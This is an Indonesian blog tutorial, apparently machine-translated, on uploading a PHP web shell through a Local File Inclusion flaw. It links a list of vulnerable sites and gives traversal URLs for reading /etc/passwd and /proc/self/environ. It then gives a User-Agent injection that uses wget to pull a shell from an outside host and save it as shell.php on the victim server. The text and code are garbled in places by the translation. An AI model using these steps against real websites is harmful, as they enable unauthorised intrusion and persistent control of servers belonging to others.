Cara Upload Shell via LFICara Upload Shell via LFI

Thursday, March 21, 2013

Cara Upload Shell via LFI

Langsung aja yah:(: Sedikit tambahan)Daftar situs inisial Yg Vuln LFI: http://pastebin.com/wBsMqh5P
1 :: Intro2 :: Menemukan LFI3 :: Memeriksa apakah proc / self / environ dapat diakses4 :: Penyuntikan kode berbahaya5 :: Akses shell kami

/ 1. Intro ::

Dalam serikat ini saya akan menunjukkan kepada Anda bagaimana untuk menempatkan shell di website menggunakan "File Inclusion lokal" kerentanan dan injeksi kode berbahaya di 'pro / self / environ'

/ 2. :: Pencari LFI

Sekarang saya akan menunjukkan cara untuk menemukan situs Local File Inclusion rentan. Ini akan membantu kita menemukan adalah target lebih cepat.

http://www.targetsite.com/view.php?page=contact.php

- Sekarang kita akan menggantikan "contact.php" dengan ".. /" sehingga URL akan menjadi

http://www.targetsite.com/view.php?page=../

dan kami punya kesalahan

Warning: include (.. /) [function.include]: failed to open stream: Tidak ada berkas atau direktori di / home / sirgod / public_html / targetsite.com / view.php on line 1.337

peluang besar untuk memiliki sebuah file lokal Inklusi vulnerability.Let 's pergi ke langkah berikutnya.

- Sekarang kita memeriksa etc / passwd untuk melihat apakah itu adalah Local File Inclusion rentan. Sekarang cobalah membuat permintaan:

http://www.targetsite.com/view.php?page=../../../etc/passwd

kita mendapatkan kesalahan dan tidak ada etc / passwd

Warning: include (.. /) [function.include]: failed to open stream: Tidak ada berkas atau direktori di / home / sirgod / public_html / targetsite.com / view.php on line 1.337

jadi kita akan pergi direktori lebih up

http://www.targetsite.com/view.php?page=../../../../../etc/passwd

kami telah berhasil termasuk etc / passwd.

root: x: 0:0: root :/ akar :/ bin / bash bin: x: 1:1: bin :/ bin :/ sbin / nologin daemon: x: 2:2: daemon :/ sbin :/ sbin / nologin adm: x: 3:4: adm :/ var / adm :/ sbin / nologin lp: x: 4:7: lp :/ var / spool / lpd :/ sbin / nologin sync: x: 05:00: sync sbin :/ :/ bin / sync shutdown: x: 6:0: shutdown :/ sbin :/ sbin / shutdown halt: x: 7:0: halt :/ sbin :/ sbin / halt mail: x: 8:12: surat :/ var / spool / mail :/ sbin / nologin news: x: 9:13: news :/ etc / news: uucp: x: 10:14: uucp :/ var / spool / uucp :/ sbin / nologin Operator : x: 11:00: Operator :/ :/ sbin akar / nologin games: x: 12:100: games :/ usr / games :/ sbin / nologin test: x: 13:30: test :/ var / test: / sbin / nologin ftp:x:14:50:FTP Pengguna :/ var / ftp :/ sbin / nologin nobody: x: 99:99: Nobody :/ :/ sbin / nologin

/ 3. :: Memeriksa apakah proc / self / environ dapat diakses

- Sekarang kita perlu melihat apakah proc / self / environ dapat diakses. Kami akan mengganti etc / passwd dengan proc / self / environ

www.targetsite.com/view.php?page=../../../../../proc/self/environ

Jika Anda akhirnya mendapatkan sesuatu seperti ini,

DOCUMENT_ROOT = / home / sirgod / public_html GATEWAY_INTERFACE = CGI/1.1 HTTP_ACCEPT = text / html, application / xml; q = 0,9, aplikasi / xhtml + xml, image / png, image / jpeg, image / gif, image / x-xbitmap , * / *, q = 0,1 HTTP_COOKIE = PHPSESSID = 134cc7261b341231b9594844ac2ad7ac HTTP_HOST = www.website.com HTTP_REFERER = http://www.website.com/index.php?view=../../../../ / / etc / passwd HTTP_USER_AGENT = Opera/9.80 (Windows NT 5.1; U; en).... Presto/2.2.15 Version/10.00 PATH = / bin :/ usr / bin QUERY_STRING = view = ..% 2F .. % 2F% 2F ..% 2F ..% 2F ..% .. 2Fproc% 2Fself% 2Fenviron REDIRECT_STATUS = 200 REMOTE_ADDR = 6x.1xx.4x.1xx REMOTE_PORT = 35.665 REQUEST_METHOD = GET REQUEST_URI = / index.php? view =. 2F%.% 2F ..% 2F ..% 2F ..% 2F ..% .. 2Fproc% 2Fself% 2Fenviron SCRIPT_FILENAME = / home / sirgod / public_html / index.php SCRIPT_NAME = / index.php SERVER_ADDR = 1xx.1xx .1 xx.6x SERVER_ADMIN = webmaster@website.com SERVER_NAME = www.website.com SERVER_PORT = 80 SERVER_PROTOCOL = HTTP/1.0 SERVER_SIGNATURE =Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV / 2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server di http://www.targetsite.com Port 80

Itu berarti lingkungan, proc / self / dapat diakses. Jika Anda mendapatkan halaman kosong, sebuah proc error / self / environ tidak dapat diakses atau OS adalah FreeBSD.

/ 4. :: Suntik kode berbahaya

- Sekarang kita akan menyuntikkan kode berbahaya kami dalam proc / self / environ. Alasan kita mampu melakukan hal ini, karena, kita dapat menyuntikkan kode kita di header HTTP user-Agen.

Gunakan Tamper Data untuk Addon Firefox untuk mengubah User-Agent. Mulai Tamper Data di Firefox dan meminta URL:

http://www.targetsite.com/view.php?page=../../../../../proc/self/environ

Pilih Tamper dan User-Agent diajukan menulis kode berikut:

<System ('wget http://www.sh3ll.org/egy.txt-O shell.php');??>

Kemudian menyerahkan permintaan tersebut.

Perintah kami akan dieksekusi (akan men-download shell txt dari http://www.sh3ll.org/egy.txt dan akan menyimpannya sebagai shell.php dalamsitus direktori) melalui sistem (), dan shell kita akan created.If tidak bekerja, coba exec () karena sistem () dapat dinonaktifkan pada webserver dari php.ini.

/ 5. :: Akses shell kami

- Sekarang mari kita memeriksa apakah kode berbahaya ini kami berhasil injected.Lets memeriksa apakah shell hadir.

http://www.targetsite.com/shell.php

Dan Taraaaa shell kamu sukses tertanam!

0 comments:

Post a Comment

pendapat ada tentang blog ini ?

 
bloger hat © 2013 Templates | imamkenteng